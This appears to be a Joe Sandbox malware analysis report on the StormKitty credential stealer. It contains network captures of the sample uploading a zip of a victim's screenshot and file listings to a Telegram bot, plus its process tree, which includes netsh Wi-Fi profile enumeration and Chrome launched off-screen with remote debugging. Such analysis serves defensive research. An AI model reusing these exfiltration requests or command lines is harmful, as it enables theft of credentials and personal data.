2025-03-14 13:22:26 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 68 65 2c 24 64 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 24 64 28 5f 2e 61 65 28 61 29 29 3a 5a 64 7c 7c 28 5a 64 5c 75 30 30 33 64 6e 65 77 20 24 64 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 Data Ascii: 8000he,$d;_.be\u003dfunction(a){return a?new $d(_.ae(a)):Zd\|\|(Zd\u003dnew $d)};_.ce\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.get

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49695	142.250.185.196	443	6520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 13:22:26 UTC	393	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-14 13:22:26 UTC	970	IN	HTTP/1.1 200 OK Version: 735763701 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 14 Mar 2025 13:22:26 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-14 13:22:26 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-03-14 13:22:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49699	149.154.167.220	443	7108	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 13:22:29 UTC	259	OUT	POST /bot8012951680:AAFEQmvyUuE56tBcSf7T4NBD4jzoxpVWuJs/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="a986351d-dd72-4e48-a37c-7ed7456220e0" Host: api.telegram.org Content-Length: 686842 Expect: 100-continue Connection: Keep-Alive
2025-03-14 13:22:29 UTC	25	IN	HTTP/1.1 100 Continue
2025-03-14 13:22:29 UTC	40	OUT	Data Raw: 2d 2d 61 39 38 36 33 35 31 64 2d 64 64 37 32 2d 34 65 34 38 2d 61 33 37 63 2d 37 65 64 37 34 35 36 32 32 30 65 30 0d 0a Data Ascii: --a986351d-dd72-4e48-a37c-7ed7456220e0
2025-03-14 13:22:29 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2025-03-14 13:22:29 UTC	11	OUT	Data Raw: 2d 34 37 31 31 39 32 34 32 36 34 Data Ascii: -4711924264
2025-03-14 13:22:29 UTC	153	OUT	Data Raw: 0d 0a 2d 2d 61 39 38 36 33 35 31 64 2d 64 64 37 32 2d 34 65 34 38 2d 61 33 37 63 2d 37 65 64 37 34 35 36 32 32 30 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 0d 0a 0d 0a Data Ascii: --a986351d-dd72-4e48-a37c-7ed7456220e0Content-Disposition: form-data; name=document; filename=8.46.123.189.zip; filename*=utf-8''8.46.123.189.zip
2025-03-14 13:22:29 UTC	4096	OUT	Data Raw: 50 4b 03 04 14 00 00 00 08 00 c9 4a 6e 5a fd 7f 3d ee ef 4b 0a 00 cc 92 0a 00 22 00 24 00 38 2e 34 36 2e 31 32 33 2e 31 38 39 2f 44 65 73 6b 74 6f 70 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0a 00 20 00 00 00 00 00 01 00 18 00 ff 7d ef 1c e4 94 db 01 ff 7d ef 1c e4 94 db 01 ff 7d ef 1c e4 94 db 01 64 bb 7b 3c 93 ff ff 3f 7e 6d 26 a7 8a ad 44 25 c7 c9 31 52 af 92 f3 1c ca 1c 6a ca 31 87 26 3a 49 25 a7 34 cc 46 0a 1d 6c e6 d4 01 53 ce 13 eb 40 39 0e e5 4c 88 90 72 3e 8c 39 9b 39 6d c6 6f 5e ef f7 fb 73 bb 7d 6f bf 3f dc 9e b6 5d d7 65 9b fb e3 7e 78 3c 1f 57 8c cd 05 f3 3d c2 87 84 01 00 d8 63 81 34 bb 04 00 fc bc 5f 21 80 e0 2e de 42 8b 67 99 f2 16 90 ff 25 73 13 a0 b0 4d 8a b1 f3 d2 4d e3 f3 c6 00 f0 91 20 b2 79 75 e7 50 a1 fb c8 cb fe 00 b0 f7 fb ce 0f Data Ascii: PKJnZ=K"$8.46.123.189/DesktopScreenshot.png }}}d{<?~m&D%1Rj1&:I%4FlS@9Lr>99mo^s}o?]e~x<W=c4_!.Bg%sMM yuP
2025-03-14 13:22:29 UTC	4096	OUT	Data Raw: d6 7c 79 62 a8 c1 18 e1 65 2c bf 15 7b 62 e3 58 55 a2 cb e8 b8 ef b1 64 1c 29 38 ff f5 43 ed 09 ab 55 95 06 7e d9 86 47 8a cb 70 86 24 1f b6 12 30 2b 79 df 75 a8 49 57 8e 61 4e 83 bf ed 39 91 dd ed c4 59 0f ae 8f 1d bd 5b 77 85 cf 3e 0c 69 b4 82 99 e7 fd 9d 34 01 24 1a 53 94 05 b4 6a ee e9 d3 9d eb 45 9e 11 aa 70 28 3c e5 81 52 36 c7 b4 2a 8c 49 5a f5 58 b4 a9 a0 99 17 4a 5f 67 1c b2 e1 dc 2a 78 66 e8 d6 c0 39 a4 56 9f a6 b1 82 00 a3 3e 5d d0 e4 d8 58 2f a7 4d 62 6b 9c 60 c7 61 4f e6 52 2a 37 4d 47 51 26 c7 ad aa cf fd b6 18 fd d9 ab 35 6c cf 98 4c cf a8 81 e1 8b 9a 1d 53 b4 64 37 5d 0f 7c 1a 0a 16 c3 83 78 da d2 66 16 72 0f 69 16 41 95 b1 cd c9 6a ff c5 52 38 f8 d5 f0 f2 7e fc 23 df 1d d4 ec c8 d3 f4 0b 53 f8 76 fa b3 50 17 89 1d e1 8a e1 71 c8 93 ca dd Data Ascii: \|ybe,{bXUd)8CU~Gp$0+yuIWaN9Y[w>i4$SjEp(<R6IZXJ_gxf9V>]X/Mbk`aOR*7MGQ&5lLSd7]\|xfriAjR8~#SvPq
2025-03-14 13:22:29 UTC	4096	OUT	Data Raw: 52 9e de 90 08 dd 5a 9a b6 1f 0a 7b cf fe f5 43 d4 9e 5c 12 7a 77 a5 9e 3a 78 69 6e ad f4 f0 0d 65 c8 b0 9c 44 7f 6f c4 6e fd 15 76 14 05 b7 51 83 ca 27 f4 af 3b 15 4f 54 65 1b f4 c6 01 52 e7 76 4c b3 ef c3 55 a5 9b 0e 46 55 5b c5 dd ed 54 bd 33 c5 d4 42 e9 f2 91 53 dd 63 da b4 2f ec ba f3 d4 fc 30 cc f2 cc 3e 9f dc b0 95 01 6d fb aa ad c1 37 f9 4a b4 ed a4 e9 26 99 8a 82 60 66 94 0f 35 6d eb a7 1e 25 07 b7 59 38 ad ed 3d 64 cb a5 7f 59 73 68 ef df da 9a 7e a5 67 68 c3 5d 6d 33 cd 1f 1a e4 d6 d4 46 51 86 06 fc cd 56 a6 52 1b a2 7a e7 a2 5a ca 2d 6c 84 2b 7d 79 ee 9c c7 ff f1 1b 2f d6 7f ec 46 6d d3 b5 cf 1d 32 4a 75 46 8e e5 bc de b2 45 19 a4 72 50 f4 55 86 3a 08 8a af 5a af d3 a4 e8 2d 54 e4 eb 8e 14 7d ce df e6 24 e8 29 c9 03 0a 16 5f 89 b9 ec 85 18 ef Data Ascii: RZ{C\zw:xineDonvQ';OTeRvLUFU[T3BSc/0>m7J&`f5m%Y8=dYsh~gh]m3FQVRzZ-l+}y/Fm2JuFErPU:Z-T}$)_
2025-03-14 13:22:29 UTC	4096	OUT	Data Raw: c7 e7 d0 a8 01 dc 7b 7e f9 31 f5 bd 6f 02 79 9a 5c dc f8 67 7e 46 d4 fe a6 6b 60 50 cb 99 13 f7 2f 81 6d 52 fc ba da 29 6f a4 83 3f e9 ce 94 1b 3d cb ea 2f ab bd 86 36 5b 69 9c cc 9f 1e 69 ef 01 1f b7 aa fe 27 8c 85 ce 1f e2 ce 56 4c 27 0f e1 50 85 60 33 60 8b 99 d4 eb 58 b5 35 7f d8 05 f4 32 1f c0 e1 81 50 f3 95 00 9e 37 c4 d9 f2 3f bc b5 a2 17 0b 1a 5a 7e 6b 33 fe 23 71 47 47 91 ac 95 b1 78 f2 e6 f8 1d d0 2d a6 cf ef a5 21 6b db 9d d0 57 2b 93 88 23 e1 d6 06 82 d0 81 ed 06 6b 76 5f fb fd ac 02 67 9b 72 a2 c0 3e b4 3b 36 e0 c5 70 ce f2 df 47 b8 e5 08 9c 8b 41 29 bd f1 cc 4d 49 2f d1 1e 7f 51 89 ad 89 a1 27 9d ed 31 3b 5b cd a4 7b 72 97 f7 e3 15 3e 5e 80 b8 cb c3 42 3c af fa 69 98 bc 3b f6 fa d1 25 d6 8a e9 86 c6 c2 51 e3 ff 8e 78 f6 1f 7e cc 4b 55 d6 b2 Data Ascii: {~1oy\g~Fk`P/mR)o?=/6[ii'VL'P`3`X52P7?Z~k3#qGGx-!kW+#kv_gr>;6pGA)MI/Q'1;[{r>^B<i;%Qx~KU
2025-03-14 13:22:29 UTC	4096	OUT	Data Raw: 52 2b a9 f7 26 a4 a7 ce 7c 78 34 de 55 91 49 16 41 5c 4b b9 76 e4 98 c7 85 02 3a 11 67 c7 7f 7b b7 06 73 ff f2 a9 08 6c 5c 04 5e d0 2e b6 c7 0f 22 09 07 f3 7b 3a d1 50 65 f3 83 8c c1 c3 c6 e6 6a 1f 7b fb 18 4c 87 5f 16 6c cc 29 72 cf 99 a7 0a 2c f8 12 6b 34 8e 5d 50 35 7b b9 81 48 4c 3f 23 8e 7b 9d a3 ab 35 79 ea 1b aa 21 d8 7e 44 40 d0 10 37 cf 7b 6f 35 22 46 62 d8 8d 92 85 58 bb bd 30 a5 af b1 72 ec 87 d0 68 47 ee cf 88 b4 3d b9 67 30 45 fa 6a 36 9f 6c c4 1f 55 57 b8 b7 56 a4 6d e7 08 57 2b ea d5 16 99 7c 80 06 20 bf a8 8f 5d 72 35 0f 83 86 92 42 9f fe 84 99 8a 7d ba 02 b6 e1 04 8b f3 4c db 14 88 6b 5f be f8 2d ae c8 51 01 74 2a 27 14 2d 3a ae 82 f6 2f 0a 8e 11 0c 59 bf 22 35 33 a7 34 0b 9f 22 62 91 da d7 a4 b4 7a c4 3c 53 21 d2 be 16 ba 05 b6 34 fa af Data Ascii: R+&\|x4UIA\Kv:g{sl\^."{:Pej{L_l)r,k4]P5{HL?#{5y!~D@7{o5"FbX0rhG=g0Ej6lUWVmW+\| ]r5B}Lk_-Qt*'-:/Y"534"bz<S!4
2025-03-14 13:22:29 UTC	4096	OUT	Data Raw: 8f ad ab 38 a1 91 9d 1f 2e 06 6f 33 91 9f ec ee cc 2e 97 ae 09 58 60 38 6a d2 00 6c 06 39 8d f9 e8 06 f6 1d 90 0b 15 e4 69 ca 51 a9 cd a1 4d fc 7b f7 26 fb 98 2b d9 a6 13 b9 c3 ef 4d a8 93 02 fb 7e 15 74 39 e8 82 5f de d7 ef fb 40 5b 09 fb 06 2d 3c 68 47 da 25 b8 04 5b 5a b3 47 03 8b ba 1c 74 58 1b f1 2a e8 bb 38 9b 8b 1b 48 7e b0 06 d0 59 aa 74 02 cd 7e c6 80 df 96 72 dd 86 b8 ce 37 ee 4c 52 1f 5f 79 fe f0 0e a5 56 ae c5 38 39 74 c1 11 98 87 4b 31 58 c0 79 5a 01 10 0c 76 dc eb 7f e1 ea ac 5b bf fb f8 87 ba 14 38 a6 6a 4d 94 fe 33 cc 24 a2 aa 34 b8 2f 67 43 e6 bf fd 45 16 ea 08 ce 09 af 7e 21 cc 22 af 38 0d 53 66 8a 66 46 ad 80 ae bb ea 13 32 2f d8 b7 5f f6 13 2b 24 59 77 6f b7 c2 a1 c1 39 50 6e 54 1b 7c 54 cd 6c 97 f3 3f a9 7b 22 bc 7a 63 9f 26 40 fc 97 Data Ascii: 8.o3.X`8jl9iQM{&+M~t9_@[-<hG%[ZGtX*8H~Yt~r7LR_yV89tK1XyZv[8jM3$4/gCE~!"8SffF2/_+$Ywo9PnT\|Tl?{"zc&@
2025-03-14 13:22:30 UTC	845	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 14 Mar 2025 13:22:30 GMT Content-Type: application/json Content-Length: 457 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":28,"from":{"id":8012951680,"is_bot":true,"first_name":"stealer","username":"cryptostealerrrr_bot"},"chat":{"id":-4711924264,"title":"ffff","type":"group","all_members_are_administrators":true},"date":1741958550,"document":{"file_name":"8.46.123.189.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAMcZ9QtloMtHZ3--jXxXAVoy-HbvQIAAtUTAALS6qFS-LkEHYqHoq42BA","file_unique_id":"AgAD1RMAAtLqoVI","file_size":686505}}}

Target ID:	0
Start time:	09:22:10
Start date:	14/03/2025
Path:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe"
Imagebase:	0xfe0000
File size:	218'624 bytes
MD5 hash:	AE95DF8DBC1FA111E8BDB7D071CF0DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.1094533087.000000000991C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1085360249.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1085360249.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:22:14
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x460000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:22:14
Start date:	14/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:22:14
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x7c0000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:22:14
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1440000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:22:14
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x660000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:22:15
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x460000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:22:15
Start date:	14/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:22:15
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x7c0000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:22:15
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1440000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:22:21
Start date:	14/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff778810000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:22:22
Start date:	14/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,4059793281164060634,11983181844265787812,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2168 /prefetch:3
Imagebase:	0x7ff778810000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report StormKittyXZeroTrace.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\StormKittyXZeroTrace.exe.bin.exe.log

C:\Users\user\AppData\Local\Temp\8.46.123.189.zip

C:\Users\user\AppData\Local\Temp\8.46.123.189\Browsers\Firefox\FirefoxBookmarks.txt

C:\Users\user\AppData\Local\Temp\8.46.123.189\DesktopScreenshot.png

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Desktop.txt

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Documents.txt

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Downloads.txt

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\OneDrive.txt

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Pictures.txt

Windows Analysis Report
StormKittyXZeroTrace.exe.bin.exe